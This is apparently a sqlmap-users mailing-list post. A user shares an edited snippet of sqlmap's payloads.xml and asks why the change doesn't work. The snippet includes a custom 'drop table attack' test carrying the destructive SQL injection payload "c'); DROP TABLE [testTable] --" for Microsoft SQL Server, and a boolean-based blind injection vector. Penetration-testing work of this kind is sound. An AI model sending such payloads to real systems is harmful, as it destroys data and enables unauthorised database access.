hi! In payloads.xml I substituted this snippet: - <!-- End of AGAINST boolean full-text search boundaries --> - <!-- Boolean-based blind tests - WHERE/HAVING clause --> - <test> - <test> <title>drop table attack</title> <stype>2</stype> <level>1</level> <risk>5</risk> <clause>1</clause> <where>1</where> <vector>c'); DROP TABLE [testTable] --</vector> - <request> <payload>c'); DROP TABLE [testTable] --</payload> <comment>--</comment> </request> - <response> <grep>object</grep> </response> - <details> <dbms>Microsoft SQL Server</dbms> </details> </test> - <test> <title>AND boolean-based blind - WHERE or HAVING clause</title> <stype>1</stype> <level>1</level> <risk>1</risk> <clause>1</clause> <where>1</where> <vector>AND [INFERENCE]</vector> - <request> <payload>AND [RANDNUM]=[RANDNUM]</payload> </request> - <response> <comparison>AND [RANDNUM]=[RANDNUM1]</comparison> </response> </test>
with this: - <!-- End of AGAINST boolean full-text search boundaries --> - <!-- Boolean-based blind tests - WHERE/HAVING clause --> - <test> - <test> <title>AND boolean-based blind - WHERE or HAVING clause</title> <stype>1</stype> <level>1</level> <risk>1</risk> <clause>1</clause> <where>1</where> <vector>AND [INFERENCE]</vector> - <request> <payload>AND [RANDNUM]=[RANDNUM]</payload> </request> - <response> <comparison>AND [RANDNUM]=[RANDNUM1]</comparison> </response> </test> but it doesn't work.. thank you ------------------------------------------------------------------------------ CenturyLink Cloud: The Leader in Enterprise Cloud Services. Learn Why More Businesses Are Choosing CenturyLink Cloud For Critical Workloads, Development Environments & Everything In Between. Get a Quote or Start a Free Trial Today. http://pubads.g.doubleclick.net/gampad/clk?id=119420431&iu=/4140/ostg.clktrk _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
